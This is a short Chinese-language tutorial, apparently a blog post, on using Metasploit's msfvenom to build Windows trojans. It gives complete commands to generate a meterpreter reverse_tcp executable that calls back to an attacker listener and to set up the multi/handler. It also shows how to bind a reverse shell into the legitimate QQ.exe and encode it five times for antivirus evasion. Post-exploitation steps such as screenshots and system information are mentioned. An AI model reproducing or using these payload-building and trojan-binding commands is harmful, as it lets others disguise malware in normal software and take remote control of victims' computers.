MSF生成windows木马
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
生成exe木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe
192.168.0.110是攻击者的监听机器,4444是被攻击机器监听端口
开启kali监听
- 启动msfconsole
- 开启监听
use exploit/multi/handler
- 设置tcp监听
set payload windows/meterpreter/reverse_tcp
- 输入explore开始监听
木马上线
当被攻击的机器(我的是windows xp)点击生成的123.exe木马时,即可以监听到木马上线
- 查看系统信息
- 查看系统截图
等等可以一系列后渗透操作。。
msf绑定软件做木马
msf也可以绑定正常软件运行,在用户看来软件正常运行,但是这个软件后台同时偷偷启动木马程序,就拿一个qq软件做例子
将QQ.exe用作绑定木马
查看编码类型
msfvenom -l encoders
如图,有很多类型编码,我们选择x86/shikata_ga_nai
编码
捆绑木马
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.110 LPORT=8080 -e x86/shikata_ga_nai -x /root/lenkee/share/QQ.exe -i 5 -f exe -o /root/lenkee/share/QQ1.exe
其中-i 5
是进行5次编码,其目的是为了面杀作用,但是这样作用已经没用了,照样被杀。生成了QQ2.exe文件
木马上线
- 启动监听
- exploit回车开始监听
- 将QQ2.exe文件拷贝回被攻击的机器,点击启动
- kali监听显示上线,但是在windows上的qq软件点击后却没有启动,不知道什么情况,有空研究一下
- 查看windows端口,发现8080后门端口被打开